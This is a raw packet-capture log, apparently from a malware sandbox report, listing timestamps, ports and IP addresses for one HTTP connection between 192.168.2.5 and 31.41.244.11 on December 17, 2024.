Dec 17, 2024 06:03:41.402255058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.402268887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.403120995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.403175116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.403248072 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.403289080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.404287100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.404305935 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.404336929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.404356003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.405452967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.405467033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.405510902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.406490088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.406503916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.406547070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.407433033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.407480955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.407548904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.407584906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.410511971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.410525084 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.410547972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.410557032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.410568953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.410587072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.410590887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.410608053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.410630941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.411365032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.411407948 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.411866903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.411885023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.411906958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.411926031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.414750099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.414767981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.414788961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.414793015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.414805889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.414818048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.414827108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.414828062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.414845943 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.414863110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.415365934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.415406942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.415853977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.415894985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.416608095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.416646957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.417006969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.417025089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.417042971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.417062998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.417916059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.417956114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.418076992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.418122053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.419050932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.419090986 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.419158936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.419197083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.420389891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.420408964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.420428991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.420444012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.421137094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.421178102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.421247005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.421289921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.422185898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.422239065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.422445059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.422487020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.423259974 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.423302889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.423337936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.423381090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.424324989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.424371004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.424546003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.424588919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.425484896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.425503016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.425532103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.425546885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.426680088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.426698923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.426729918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.426745892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.427522898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.427567005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.427597046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.427639961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.428622961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.428651094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.428669930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.428685904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.429610014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.429653883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.566725969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.566782951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.566787958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.566895962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.567364931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.567414999 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.567459106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.568490982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.568511009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.568537951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.568556070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.569358110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.569401979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.569590092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.570050001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.570379972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.570399046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.570436001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.570447922 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.572119951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.572202921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.572263956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.572995901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.573041916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.573154926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.573199987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.573811054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.573831081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.573857069 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.573872089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.574759007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.574923992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.574956894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.574969053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.575865030 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.575882912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.575917959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.575928926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.576920033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.576942921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.576963902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.576988935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.577646017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.577685118 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.577791929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.577835083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.578811884 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.578835011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.578855038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.578866959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.579787970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.579833031 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.579866886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.579906940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.580846071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.580889940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.580981016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.581023932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.581947088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.581990004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.582000971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.582046032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.582968950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.583019018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.583039045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.583080053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.583986998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.584033012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.584127903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.584163904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.585058928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.585112095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.585150957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.585207939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.586117029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.586163044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.586250067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.586296082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.587194920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.587244987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.587282896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.587327003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.588326931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.588371992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.588376045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.588418961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.589354038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.589454889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.589482069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.589520931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.590513945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.590555906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.590589046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.590634108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.591427088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.591471910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.591541052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.591586113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.592832088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.592853069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.592891932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.592901945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.593561888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.593616962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.593909979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.593955040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.597029924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.597049952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.597074986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.597075939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.597095013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.597095966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.597115040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.597116947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.597134113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.597137928 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.597151995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.597172976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.598150969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.598197937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.598431110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.598474026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.599267960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.599318027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.599414110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.599457026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.599956036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.600001097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.600142002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.600183964 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.601032019 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.601089954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.601099968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.601145029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.603074074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.603092909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.603128910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.603143930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.604070902 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.604099035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.604113102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.604134083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.604156971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.604192972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.604475021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.604520082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.605256081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.605302095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.605379105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.605427027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.606262922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.606306076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.606530905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.606573105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.607713938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.607773066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.608088970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.608144999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.608827114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.608875036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.609006882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.609055042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.609462976 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.609508038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.609586954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.609630108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.610512972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.610555887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.610752106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.610796928 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.611999035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.612018108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.612044096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.612054110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.612960100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.612981081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.613001108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.613009930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.613953114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.613971949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.614000082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.614010096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.614723921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.614783049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.614856958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.614906073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.616223097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.616276026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.616756916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.616807938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.617289066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.617327929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.617772102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.617811918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.618221045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.618238926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.618264914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.618274927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.618988991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.619035959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.619101048 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.619143009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.620073080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.620116949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.620153904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.620194912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.621095896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.621140957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.621268988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.621335030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.622179985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.622236013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.762799978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762824059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762852907 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762870073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762892962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762907028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.762912989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762955904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.762959957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.762981892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.763003111 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.763027906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.763355017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.763403893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.763479948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.763521910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.764478922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.764497995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.764519930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.764540911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.765587091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.765634060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.765743971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.765786886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:41.766602993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.766670942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:41.766673088 CET	49902	80	192.168.2.5	31.41.244.11
